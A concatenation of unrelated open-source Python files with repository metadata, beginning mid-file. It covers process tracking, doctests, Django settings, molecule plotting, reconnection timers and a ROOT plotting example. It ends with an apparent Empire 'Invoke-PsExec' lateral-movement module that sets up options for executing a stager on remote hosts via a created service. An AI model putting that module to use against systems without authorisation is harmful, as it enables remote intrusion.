self._procdict[key] = self._process.children(recursive)
except AttributeError:
self._procdict[key] = self._process.get_children(recursive)
return self._procdict[key]
def _attr(self, name):
if name not in self._procdict:
attr = getattr(self._process, name)
try:
self._procdict[name] = attr()
except TypeError:
self._procdict[name] = attr
return self._procdict[name]
def __getattr__(self, item):
return getattr(self._process, item)
# psutil 3.x to 1.x backward compatibility
def memory_maps(self, grouped=True):
key = 'memory_maps-{0}'.format(grouped)
if key not in self._procdict:
try:
self._procdict[key] = self._process.memory_maps(grouped=grouped)
except AttributeError:
self._procdict[key] = self._process.get_memory_maps(grouped=grouped)
return self._procdict[key]
class ProcessMeta(type):
"""
Caching metaclass that ensures that only one ``Process`` object is ever
instantiated for any given PID. The cache can be cleared by calling
``Process.reset_cache()``.
Based on https://stackoverflow.com/a/33458129
"""
def __init__(cls, name, bases, attributes):
super(ProcessMeta, cls).__init__(name, bases, attributes)
def reset_cache():
cls._cache = {}
reset_cache()
setattr(cls, 'reset_cache', reset_cache)
def __call__(cls, *args, **kwargs):
pid = args[0]
if pid not in cls._cache:
self = cls.__new__(cls, *args, **kwargs)
cls.__init__(self, *args, **kwargs)
cls._cache[pid] = self
return cls._cache[pid]
class Process(with_metaclass(ProcessMeta, ProcessWrapper)):
"""
    Represent a process instance uniquely identified by its PID
For all class properties and methods, please see
http://pythonhosted.org/psutil/#process-class
Below listed are only reimplemented ones.
For performance reasons, instances are cached based on PID, and
multiple instantiations of a ``Process`` object with the same PID will
return the same object. To clear the cache, invoke
``Process.reset_cache()``. Additionally, as with ``ProcessWrapper``,
process information is cached at object creation. To force a refresh,
invoke the ``rebuild_cache()`` method on the object.
"""
def __eq__(self, process):
"""For our purposes, two processes are equal when they have same name"""
return self.pid == process.pid
def __ne__(self, process):
return not self.__eq__(process)
def __hash__(self):
return hash(self.pid)
@staticmethod
def safe_isfile(file_path, timeout=0.5):
"""
Process arguments could be referring to files on remote filesystems and
os.path.isfile will hang forever if the shared FS is offline.
Instead, use a subprocess that we can time out if we can't reach some file.
"""
process = Popen(['test', '-f', file_path], stdout=PIPE, stderr=PIPE)
timer = Timer(timeout, process.kill)
try:
timer.start()
process.communicate()
return process.returncode == 0
finally:
timer.cancel()
@property
def files(self):
files = []
# Files from memory maps
for mmap in self.memory_maps():
files.append(FilenameCleaner.strip(mmap.path))
# Process arguments
for arg in self.cmdline()[1:]:
if not os.path.isabs(arg):
continue
if Process.safe_isfile(arg):
files.append(arg)
return sorted(files)
def parent(self):
"""The parent process casted from ``psutil.Process`` to tracer ``Process``"""
if self.ppid():
return Process(self.ppid())
return None
def username(self):
"""The user who owns the process. If user was deleted in the meantime,
``None`` is returned instead."""
# User who run the process can be deleted
try:
return super(Process, self).username()
except KeyError:
return None
def children(self, recursive=False):
"""The collection of process's children. Each of them casted from ``psutil.Process``
to tracer ``Process``."""
children = super(Process, self).children(recursive)
return ProcessesCollection([Process(child.pid) for child in children])
@property
def exe(self):
"""The absolute path to process executable. Cleaned from arbitrary strings
which appears on the end."""
# On Gentoo, there is #new after some files in lsof
# i.e. /usr/bin/gvim#new (deleted)
exe = super(Process, self).exe()
if exe.endswith('#new'):
exe = exe[0:-4]
# On Fedora, there is something like ;541350b3 after some files in lsof
if ';' in exe:
exe = exe[0:exe.index(';')]
return exe
@property
def is_interpreted(self):
# @TODO implement better detection of interpreted processes
return self.name() in ["python"]
@property
def is_session(self):
terminal = self.terminal()
if terminal is None:
return None
parent = self.parent()
if parent is None or terminal != parent.terminal():
return True
@property
def real_name(self):
if self.is_interpreted:
for arg in self.cmdline()[1:]:
if os.path.isfile(arg):
return os.path.basename(arg)
return self.name()
@property
def str_started_ago(self):
"""
The time of how long process is running. Returned as string
in format ``XX unit`` where unit is one of
``days`` | ``hours`` | ``minutes`` | ``seconds``
"""
now = datetime.datetime.fromtimestamp(time.time())
started = datetime.datetime.fromtimestamp(self.create_time())
started = now - started
started_str = ""
if started.days > 0:
started_str = str(started.days) + " days"
elif started.seconds >= 60 * 60:
started_str = str(int(started.seconds / (60 * 60))) + " hours"
elif started.seconds >= 60:
started_str = str(int(started.seconds / 60)) + " minutes"
elif started.seconds >= 0:
started_str = str(int(started.seconds)) + " seconds"
return started_str
class AffectedProcess(Process):
packages = None
files = None
def __init__(self, pid=None):
Process.__init__(self, pid)
self.packages = set()
self.files = set()
def update(self, process):
self.files = self.files.union(process.files)
self.packages = self.packages.union(process.packages)
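# Minimal usage sketch (not part of the original module; it assumes a live
# system where the current PID exists and psutil can access it):
if __name__ == '__main__':
    me = Process(os.getpid())
    also_me = Process(os.getpid())
    # The ProcessMeta cache guarantees a single instance per PID.
    assert me is also_me
    print("{0} running for {1}".format(me.name(), me.str_started_ago))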
|
FrostyX/tracer
|
tracer/resources/processes.py
|
Python
|
gpl-2.0
| 9,071
| 0.026127
|
#!/usr/bin/env python
#
# vim:syntax=python:sw=4:ts=4:expandtab
"""
test hasAttributes()
---------------------
>>> from guppy import hasAttributes
>>> class Foo(object):
... def __init__(self):
... self.a = 23
... self.b = 42
>>> hasAttributes('a')(Foo())
True
>>> hasAttributes('b')(Foo())
True
>>> hasAttributes('a', 'b')(Foo())
True
>>> hasAttributes('c')(Foo())
False
"""
"""
test hasMethods()
-----------------
>>> from guppy import hasMethods
>>> class Bar(object):
... def a(self): return 23
... def b(self): return 42
>>> hasMethods('a')(Bar())
True
>>> hasMethods('b')(Bar())
True
>>> hasMethods('b', 'a')(Bar())
True
>>> hasMethods('c')(Bar())
False
"""
"""
test isInstanceOf()
-------------------
>>> from guppy import isInstanceOf
>>> class BA(object): pass
>>> class BB(object): pass
>>> class C(BA, BB): pass
>>> isInstanceOf(str)("test")
True
>>> isInstanceOf(list)([1,2,3])
True
>>> isInstanceOf(dict)(dict(a = 23))
True
>>> isInstanceOf(BA, BB, C)(C())
True
>>> isInstanceOf(int)("test")
False
>>> isInstanceOf(list)("test")
False
>>> isInstanceOf(BB, C)(BA())
False
"""
"""
test implementProtocol()
------------------------
>>> from guppy import implementProtocol, Protocol
>>> class FooBarProtocol(Protocol):
... def foo(): pass
... def bar(): pass
>>> class SpamEggsProtocol(Protocol):
... def spam(): pass
... def eggs(): pass
>>> class AllProtocol(FooBarProtocol, SpamEggsProtocol): pass
>>> class FooBar(object):
... def foo(): pass
... def bar(): pass
>>> class SpamEggs(object):
... def spam(): pass
... def eggs(): pass
>>> class AllInherit(FooBar, SpamEggs): pass
>>> class All(object):
... def foo(): pass
... def bar(): pass
... def spam(): pass
... def eggs(): pass
>>> implementProtocol(FooBarProtocol)(FooBar())
True
>>> implementProtocol(SpamEggsProtocol)(FooBar())
False
>>> implementProtocol(AllProtocol)(FooBar())
False
>>> implementProtocol(SpamEggsProtocol)(SpamEggs())
True
>>> implementProtocol(FooBarProtocol)(SpamEggs())
False
>>> implementProtocol(AllProtocol)(SpamEggs())
False
>>> implementProtocol(SpamEggsProtocol)(All())
True
>>> implementProtocol(FooBarProtocol)(All())
True
>>> implementProtocol((SpamEggsProtocol, FooBarProtocol))(All())
True
>>> implementProtocol(AllProtocol)(All())
True
>>> implementProtocol(SpamEggsProtocol)(AllInherit())
True
>>> implementProtocol(FooBarProtocol)(AllInherit())
True
>>> implementProtocol((SpamEggsProtocol, FooBarProtocol))(AllInherit())
True
>>> implementProtocol(AllProtocol)(AllInherit())
True
>>> implementProtocol(SpamEggsProtocol)('')
False
>>> implementProtocol(FooBarProtocol)('')
False
>>> implementProtocol(AllProtocol)('')
False
>>> implementProtocol(str)('')
True
>>> implementProtocol(list)('')
False
>>> implementProtocol(list)([])
True
>>> implementProtocol(str)([])
False
>>> implementProtocol(dict)({})
True
>>> implementProtocol(list)({})
False
"""
|
xfire/guppy
|
test/doctest_assertions.py
|
Python
|
gpl-2.0
| 3,440
| 0
|
from tempfile import gettempdir
from os.path import join, dirname
import example_project
ADMINS = (
)
MANAGERS = ADMINS
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DISABLE_CACHE_TEMPLATE = DEBUG
DATABASE_ENGINE = 'sqlite3'
DATABASE_NAME = join(gettempdir(), 'django_ratings_example_project.db')
TEST_DATABASE_NAME =join(gettempdir(), 'test_django_ratings_example_project.db')
DATABASE_USER = ''
DATABASE_PASSWORD = ''
DATABASE_HOST = ''
DATABASE_PORT = ''
TIME_ZONE = 'Europe/Prague'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
# Make this unique, and don't share it with anybody.
SECRET_KEY = '88b-01f^x4lh$-s5-hdccnicekg07)niir2g6)93!0#k(=mfv$'
EMAIL_SUBJECT_PREFIX = 'Example project admin: '
# templates for this app
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DISABLE_CACHE_TEMPLATE = DEBUG
# TODO: Fix logging
# init logger
#LOGGING_CONFIG_FILE = join(dirname(testbed.__file__), 'settings', 'logger.ini')
#if isinstance(LOGGING_CONFIG_FILE, basestring) and isfile(LOGGING_CONFIG_FILE):
# logging.config.fileConfig(LOGGING_CONFIG_FILE)
# LOGGING_CONFIG_FILE = join( dirname(__file__), 'logger.conf')
# we want to reset the whole cache in tests;
# until we do that, don't use a cache
CACHE_BACKEND = 'dummy://'
# session expire
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
# disable double render in admin
# DOUBLE_RENDER = False
MEDIA_ROOT = join(dirname(example_project.__file__), 'static')
MEDIA_URL = '/static/'
ADMIN_MEDIA_PREFIX = '/static/admin_media/'
|
ella/django-ratings
|
tests/example_project/settings/config.py
|
Python
|
bsd-3-clause
| 1,465
| 0.004778
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 22 14:18:45 2016
@author: Alex Kerr
Define functions that draw molecule objects.
"""
import copy
from itertools import cycle
import matplotlib.pyplot as plt
from matplotlib import colors
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
from .molecule import chains
plt.close("all")
atomColors = {1:"white",6:"black",7:"skyblue",8:"red",9:"green",15:"orange",16:"yellow",17:"green",35:"orange",
21:"white", 22:"red", 23:"green", 24:"blue", 25:"orange"}
atomicRadii = {1:25,6:70,7:65,8:60,9:50,15:100,16:100,17:100,35:115,
21:120, 22:150, 23:190, 24:200, 25:210}
radList = np.zeros(max(list(atomicRadii.items()))[0]+1, dtype=np.int16)
for key,value in atomicRadii.items():
radList[key] = value
def bonds(molecule, sites=False, indices=False, faces=False, order=False,
atomtypes=False, linewidth=4.):
"""Draw a 2d 'overhead' view of a molecule."""
fig = plt.figure()
figTitle = molecule.name
posList = molecule.posList
length = len(molecule)
for bond in molecule.bondList:
i,j = bond
plt.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
plt.scatter(posList[:,0],posList[:,1],s=1.5*radList[molecule.zList],c=cList,
edgecolors='k')
if indices:
for index, pos in enumerate(molecule.posList):
plt.annotate(index, (pos[0]+.1, pos[1]+.1), color='b', fontsize=10)
if atomtypes:
for atomtype, pos in zip(molecule.atomtypes, molecule.posList):
plt.annotate(atomtype, (pos[0]-.5, pos[1]-.5), color='b', fontsize=10)
if faces:
for i,face in enumerate(molecule.faces):
openAtoms = [x for x in face.atoms if x not in face.closed]
plt.plot(face.pos[0],face.pos[1], 'rx', markersize=15., zorder=-2)
plt.scatter(posList[openAtoms][:,0], posList[openAtoms][:,1], s=75., c='red')
plt.scatter(posList[face.closed][:,0], posList[face.closed][:,1], s=40, c='purple')
plt.annotate(i, (face.pos[0]-.35*face.norm[0], face.pos[1]-.35*face.norm[1]),
color='r', fontsize=20)
if np.linalg.norm(face.norm[:2]) > 0.0001:
plt.quiver(face.pos[0]+.5*face.norm[0], face.pos[1]+.5*face.norm[1], 5.*face.norm[0], 5.*face.norm[1],
color='r', headwidth=1, units='width', width=5e-3, headlength=2.5)
if order:
for index, bo in enumerate(molecule.bondorder):
i,j = molecule.bondList[index]
midpoint = (molecule.posList[i]+molecule.posList[j])/2.
plt.annotate(bo, (midpoint[0], midpoint[1]), color='k', fontsize=20)
fig.suptitle(figTitle, fontsize=18)
plt.axis('equal')
plt.xlabel('x-position', fontsize=13)
plt.ylabel('y-position', fontsize=13)
plt.show()
def bondsax(molecule, ax, sites=False, indices=False, faces=False, order=False,
atomtypes=False, linewidth=4., size_scale=1.):
"""Draw a 2d 'overhead' view of a molecule."""
plt.sca(ax)
posList = molecule.posList
length = len(molecule)
for bond in molecule.bondList:
i,j = bond
plt.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
plt.scatter(posList[:,0],posList[:,1],s=1.5*radList[molecule.zList]*size_scale,c=cList,
edgecolors='k')
if indices:
for index, pos in enumerate(molecule.posList):
plt.annotate(index, (pos[0]+.1, pos[1]+.1), color='b', fontsize=10)
if atomtypes:
for atomtype, pos in zip(molecule.atomtypes, molecule.posList):
plt.annotate(atomtype, (pos[0]-.5, pos[1]-.5), color='b', fontsize=10)
if faces:
for i,face in enumerate(molecule.faces):
openAtoms = [x for x in face.atoms if x not in face.closed]
plt.plot(face.pos[0],face.pos[1], 'rx', markersize=15., zorder=-2)
plt.scatter(posList[openAtoms][:,0], posList[openAtoms][:,1], s=75., c='red')
plt.scatter(posList[face.closed][:,0], posList[face.closed][:,1], s=40, c='purple')
plt.annotate(i, (face.pos[0]-.35*face.norm[0], face.pos[1]-.35*face.norm[1]),
color='r', fontsize=20)
if np.linalg.norm(face.norm[:2]) > 0.0001:
plt.quiver(face.pos[0]+.5*face.norm[0], face.pos[1]+.5*face.norm[1], 5.*face.norm[0], 5.*face.norm[1],
color='r', headwidth=1, units='width', width=5e-3, headlength=2.5)
if order:
for index, bo in enumerate(molecule.bondorder):
i,j = molecule.bondList[index]
midpoint = (molecule.posList[i]+molecule.posList[j])/2.
plt.annotate(bo, (midpoint[0], midpoint[1]), color='k', fontsize=20)
plt.axis('equal')
plt.show()
def scatter_obj(size_scale, fs):
"""
Return a scatter object for legend purposes.
"""
fig, ax = plt.subplots()
x,y = [], []
c, s = [],[]
for i, z, name in zip(np.arange(6), [1,6,9,17,35], ['H', 'C', 'F', 'Cl', 'Br']):
x.append(0.)
y.append(-i*.2)
c.append(atomColors[z])
s.append(1.5*size_scale*radList[z])
ax.text(.005, -i*.2, name, fontsize=fs)
ax.scatter(x,y , c=c, s=s, edgecolors='k')
ax.axis('off')
def bonds3d(molecule, sites=False, indices=False, save=False,
linewidth=2.):
"""Draw the molecule's bonds
Keywords:
sites (bool): Set True to draw atomic sites. Default is False.
indices (bool): Set True to draw atomic site indices near atomic sites. Default is False."""
fig = plt.figure()
ax=Axes3D(fig)
figTitle = molecule.name
plotSize = 5
posList = molecule.posList/molecule.ff.lunits
length = len(posList)
for bond in molecule.bondList:
i,j = bond
ax.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
[posList[i][2],posList[j][2]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
ax.scatter(posList[:,0],posList[:,1],posList[:,2],
s=radList[molecule.zList],c=cList,
marker='o',depthshade=False,
edgecolors='k')
if indices:
ds = 0.1
for index,pos in enumerate(posList):
x,y,z = pos
ax.text(x+ds,y+ds,z+ds,str(index),color="blue")
fig.suptitle(figTitle, fontsize=18)
ax.grid(False)
ax._axis3don = False
ax.set_xlim3d(-plotSize,plotSize)
ax.set_ylim3d(-plotSize,plotSize)
ax.set_zlim3d(-plotSize,plotSize)
ax.set_xlabel('x-position' + ' (' + r'$\AA$' + ')')
ax.set_ylabel('y-position' + ' (' + r'$\AA$' + ')')
ax.set_zlabel('z-position' + ' (' + r'$\AA$' + ')')
if save:
plt.savefig("./kappa_save/%s.png" % molecule.name)
plt.show()
def bonds3d_list(molList, sites=False, indices=False, save=False,
linewidth=2.):
"""Draw the molecule's bonds
Keywords:
sites (bool): Set True to draw atomic sites. Default is False.
indices (bool): Set True to draw atomic site indices near atomic sites. Default is False."""
fig = plt.figure()
ax=Axes3D(fig)
plotSize = 5
for molecule in molList:
posList = molecule.posList/molecule.ff.lunits
length = len(posList)
for bond in molecule.bondList:
i,j = bond
ax.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
[posList[i][2],posList[j][2]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
ax.scatter(posList[:,0],posList[:,1],posList[:,2],
s=radList[molecule.zList],c=cList,
marker='o',depthshade=False,
edgecolors='k')
if indices:
ds = 0.1
for index,pos in enumerate(posList):
x,y,z = pos
ax.text(x+ds,y+ds,z+ds,str(index),color="blue")
ax.grid(False)
ax._axis3don = False
ax.set_xlim3d(-plotSize,plotSize)
ax.set_ylim3d(-plotSize,plotSize)
ax.set_zlim3d(-plotSize,plotSize)
ax.set_xlabel('x-position' + ' (' + r'$\AA$' + ')')
ax.set_ylabel('y-position' + ' (' + r'$\AA$' + ')')
ax.set_zlabel('z-position' + ' (' + r'$\AA$' + ')')
if save:
plt.savefig("./kappa_save/%s.png" % molecule.name)
plt.show()
def face(molecule, facenum):
"""Plot the given interface of the molecule"""
mol = copy.deepcopy(molecule)
face = mol.faces[facenum]
fig = plt.figure()
#rotate molecule to 'camera' position
axis = np.cross(face.norm, np.array([0.,0.,1.]))
mag = np.linalg.norm(axis)
if mag < 1e-10:
#check for parallel/anti-parallel
dot = np.dot(face.norm, np.array([0.,0.,1.]))
if dot < 0.:
#don't rotate
pass
if dot >0.:
#flip the molecule
mol.invert()
else:
angle = np.degrees(np.arcsin(mag))
mol.rotate(axis,angle)
#center interface
mol.translate(-face.pos)
plt.scatter(mol.posList[face.atoms][:,0], mol.posList[face.atoms][:,1], s=30., c='red')
ds = .2
# ds = np.full(len(face.atoms), ds)
# plt.text(mol.posList[face.atoms][:,0]+ds, mol.posList[face.atoms][:,1]+ds, str(face.atoms))
for atom in face.atoms:
plt.text(mol.posList[atom][0]+ds, mol.posList[atom][1]+ds, str(atom), color='blue')
fig.suptitle("Interface %s of %s" % (facenum, molecule), fontsize=18)
plt.axis('equal')
plt.show()
def faces(molecule):
for count in range(len(molecule.faces)):
face(molecule, count)
def normal_modes(mol,evec, track=None):
"""Draw a visualization of a normal mode of a molecule.
Keywords:
track (array-like): An array of indices to highlight in the plots.
Indices should be in '3*index' format to reflect direction."""
fig = plt.figure()
ax=Axes3D(fig)
length = len(mol)
ar = np.arange(length, dtype=int)
ax.scatter(mol.posList[:,0],mol.posList[:,1],mol.posList[:,2])
ax.quiver( mol.posList[:,0],mol.posList[:,1],mol.posList[:,2],
evec[3*ar].real, evec[3*ar + 1].real, evec[3*ar + 2].real, pivot='tail')
if track is not None:
for index in track:
atom = int(index/3.)
ax.scatter(mol.posList[atom,0], mol.posList[atom,1], mol.posList[atom,2],
s=100., c='red', zorder=-3)
point_index = index%3
point = np.array([0.,0.,0.])
point[point_index] = 1.
ax.quiver(mol.posList[atom,0], mol.posList[atom,1], mol.posList[atom,2],
point[0], point[1], point[2], pivot='tail', cmap='Reds', zorder=-2, lw=5.)
size = 12
ax.set_xlim3d(-size,size)
ax.set_ylim3d(-size,size)
ax.set_zlim3d(-size,size)
ax._axis3don = False
plt.show()
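# Illustrative call (hypothetical indices): to highlight the x- and y-components of
# atom 4 while visualizing an eigenvector `evec` of the hessian, use the '3*index'
# convention described in the docstring, e.g.
#     normal_modes(mol, evec, track=[12, 13])    # 12 = 3*4 (x), 13 = 3*4 + 1 (y)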
def density(val):
# density = gaussian_kde(val.flatten())
# x = np.linspace(-20, 20, 1000)
# density.covariance_factor = lambda: .25
# density._compute_covariance()
# plt.plot(x, density(x))
n, bins, patches = plt.hist(val.flatten(), bins=200)
plt.axis([-10000, 10000, 0, 1e6])
plt.show()
def participation(mol):
"""Plot the participation ratios of each normal mode as a function of their frequencies."""
fig = plt.figure()
from .operation import hessian, evecs
hess = hessian(mol)
val, vec = evecs(hess)
num = np.sum((vec**2), axis=0)**2
den = len(vec)*np.sum(vec**4, axis=0)
plt.scatter(val, num/den)
fig.suptitle("Participation ratios of %s" % mol.name)
plt.show()
def grid(values):
"""Plot a grid of values."""
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
colors = ['b', 'r', 'g', 'y']
xs = np.arange(values.shape[2])
count = 0
for block, c in zip(values, cycle(colors)):
for row in block:
ax.bar(xs, row, zs=count*2, zdir='y', color=c, alpha=.85)
count += 1
def kappa(filename, cid, dim, dimval, avg=False, legend=True):
"""Plot kappa values along a particular dimension."""
colors = ['b','r','y','c','m','g','k','w']
data = np.genfromtxt(filename,
dtype=[('kappa', 'f8'), ('cid', 'i4'),('clen','i4'),
('cnum','i4'), ('dbav', 'i4'), ('param1', 'i4'),
('param2', 'i4'), ('g', 'f8'), ('ff', 'S5'),
('indices', 'S30'), ('time','S16')], delimiter=";")
kappa = []
param = []
for datum in data:
if datum[0] < 0.:
continue
else:
kappa.append(datum[0])
param.append(list(datum)[1:7])
kappa = np.array(kappa)
param = np.array(param)
if dim.lower() == 'length':
index = 1
slice_ = 2
elif dim.lower() == 'num':
index = 2
slice_ = 1
else:
raise ValueError('Dimension string was invalid')
p = param[np.where(param[:,index]==dimval)[0],:]
kappa = kappa[np.where(param[:,index]==dimval)[0]]
for count, id_ in enumerate(cid):
idnum = chains.index(id_)
indices = np.where(p[:,0]==idnum)
vals = p[indices,slice_][0]
if avg is True:
marker = '-'
xy={}
for val, k in zip(vals,kappa[indices]):
try:
xy[val].append(k)
except KeyError:
xy[val] = [k]
x, y = [], []
for key in xy:
x.append(key)
y.append(np.average(xy[key]))
else:
marker = 'o'
x, y = vals, kappa[indices]
plt.figure(1)
plt.plot(x, y, colors[count]+marker,
label=id_, markersize=8, linewidth=3)
plt.figure(2)
plt.plot(x, np.cumsum(y), colors[count]+marker,
label=id_, markersize=8, linewidth=3)
plt.suptitle("Integrated Thermal Conductivity")
plt.figure(1)
plt.suptitle("Thermal conductivity vs. Chain Length", fontsize=18)
if legend:
plt.legend()
plt.figure(2)
plt.legend()
plt.xlabel("Chain Length (molecular units)", fontsize=15)
plt.ylabel("Integrated Driving Power", fontsize=15)
plt.figure(1)
plt.xlabel("Chain Length (molecular units)", fontsize=15)
plt.ylabel("Total Driving Power (ff units)", fontsize=15)
plt.show()
|
ajkerr0/kappa
|
kappa/plot.py
|
Python
|
mit
| 16,060
| 0.022167
|
from time import sleep
import math
__author__ = 'sergio'
## @package clitellum.endpoints.channels.reconnectiontimers
# This package contains the classes for the reconnection timers
#
## Factory method that creates an instance of an instant
# timer
def CreateInstantTimer():
    return InstantReconnectionTimer()
## Factory method that creates an instance of a logarithmic
# timer
def CreateLogarithmicTimer():
    return LogarithmicReconnectionTimer()
## Factory method that creates an instance of a constant-time timer
def CreateConstantTimer(waiting_time=5):
    return ConstantReconnectionTimer(waiting_time=waiting_time)
## Creates a timer according to the specified type
# @param type Timer type: "Instant", "Constant" or "Logarithmic"
def CreateTimerFormType(type):
    if type == "Instant":
        return CreateInstantTimer()
    elif type == 'Constant':
        return ConstantReconnectionTimer()
    else:
        return CreateLogarithmicTimer()
## Creates a timer from a configuration, e.g.
# { type :'Instant' }
# { type :'Constant', time : 10 }
# { type :'Logarithmic' }
def CreateTimerFormConfig(config):
    if config['type'] == "Instant":
        return CreateInstantTimer()
    elif config['type'] == 'Constant':
        if config.get('time') is not None:
            return ConstantReconnectionTimer(config['time'])
        else:
            return ConstantReconnectionTimer()
    else:
        return CreateLogarithmicTimer()
## Base class that provides the basic structure of a reconnection timer
class ReconnectionTimer:
    ## Creates an instance of the reconnection timer
    def __init__(self):
        pass
    ## Waits one cycle turn before continuing
    def wait(self):
        pass
    ## Resets the timer
    def reset(self):
        pass
## Class that provides an instant reconnection timer:
# there is no waiting time between one cycle and the next
class InstantReconnectionTimer(ReconnectionTimer):
    ## Creates an instance of the instant timer
    def __init__(self):
        ReconnectionTimer.__init__(self)
    ## Converts the instance to a string
    def __str__(self):
        return "Instant Reconnection Timer"
## Defines a reconnection timer in which the waiting time between one cycle
# and the next grows logarithmically.
class LogarithmicReconnectionTimer(ReconnectionTimer):
    def __init__(self):
        ReconnectionTimer.__init__(self)
        self.__seed = 1
    def wait(self):
        waitingTime = ((1 + (1 / self.__seed)) ** self.__seed) * (1 + math.log10(self.__seed))
        if waitingTime < 0:
            waitingTime = 0
        sleep(waitingTime)
        self.__seed += 1
    def reset(self):
        self.__seed = 1
    ## Converts the instance to a string
    def __str__(self):
        return "Logarithmic Reconnection Timer, seed: %s" % self.__seed
## Defines a reconnection timer in which the waiting time between one cycle
# and the next is constant.
class ConstantReconnectionTimer(ReconnectionTimer):
def __init__(self, waiting_time=5):
ReconnectionTimer.__init__(self)
self.__waiting_time = waiting_time
def wait(self):
sleep(self.__waiting_time)
def reset(self):
pass
    ## Converts the instance to a string
    def __str__(self):
        return "Constant Reconnection Timer, waiting time: %s" % self.__waiting_time
|
petxo/clitellum
|
clitellum/endpoints/channels/reconnectiontimers.py
|
Python
|
gpl-3.0
| 3,471
| 0.007779
|
#!/usr/bin/env python
"""
=================================================
Draw a Quantile-Quantile Plot and Confidence Band
=================================================
This is an example of drawing a quantile-quantile plot with a confidence level
(CL) band.
"""
print __doc__
import ROOT
from rootpy.interactive import wait
from rootpy.plotting import Hist, Canvas, Legend, set_style
from rootpy.plotting.contrib.quantiles import qqgraph
set_style('ATLAS')
c = Canvas(width=1200, height=600)
c.Divide(2, 1, 1e-3, 1e-3)
rand = ROOT.TRandom3()
h1 = Hist(100, -5, 5, name="h1", title="Histogram 1",
linecolor='red', legendstyle='l')
h2 = Hist(100, -5, 5, name="h2", title="Histogram 2",
linecolor='blue', legendstyle='l')
for ievt in xrange(10000):
h1.Fill(rand.Gaus(0, 0.8))
h2.Fill(rand.Gaus(0, 1))
pad = c.cd(1)
h1.Draw('hist')
h2.Draw('hist same')
leg = Legend([h1, h2], pad=pad, leftmargin=0.5,
topmargin=0.11, rightmargin=0.05,
textsize=20)
leg.Draw()
pad = c.cd(2)
gr = qqgraph(h1, h2)
gr.xaxis.title = h1.title
gr.yaxis.title = h2.title
gr.fillcolor = 17
gr.fillstyle = 'solid'
gr.linecolor = 17
gr.markercolor = 'darkred'
gr.markerstyle = 20
gr.title = "QQ with CL"
gr.Draw("ap")
x_min = gr.GetXaxis().GetXmin()
x_max = gr.GetXaxis().GetXmax()
y_min = gr.GetYaxis().GetXmin()
y_max = gr.GetYaxis().GetXmax()
gr.Draw('a3')
gr.Draw('Xp same')
# a straight line y=x to be a reference
f_dia = ROOT.TF1("f_dia", "x",
h1.GetXaxis().GetXmin(),
h1.GetXaxis().GetXmax())
f_dia.SetLineColor(9)
f_dia.SetLineWidth(2)
f_dia.SetLineStyle(2)
f_dia.Draw("same")
leg = Legend(3, pad=pad, leftmargin=0.45,
topmargin=0.45, rightmargin=0.05,
textsize=20)
leg.AddEntry(gr, "QQ points", "p")
leg.AddEntry(gr, "68% CL band", "f")
leg.AddEntry(f_dia, "Diagonal line", "l")
leg.Draw()
c.Modified()
c.Update()
c.Draw()
wait()
|
qbuat/rootpy
|
examples/stats/plot_quantiles.py
|
Python
|
gpl-3.0
| 1,944
| 0.002058
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-PsExec',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using PsExec type functionality.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/rapid7/metasploit-framework/blob/master/tools/psexec.rb'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'ServiceName' : {
'Description' : 'The name of the service to create.',
'Required' : True,
'Value' : 'Updater'
},
'Command' : {
'Description' : 'Custom command to execute on remote hosts.',
'Required' : False,
'Value' : ''
},
'ResultFile' : {
'Description' : 'Name of the file to write the results to on agent machine.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
computerName = self.options['ComputerName']['Value']
serviceName = self.options['ServiceName']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
command = self.options['Command']['Value']
resultFile = self.options['ResultFile']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-PsExec.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
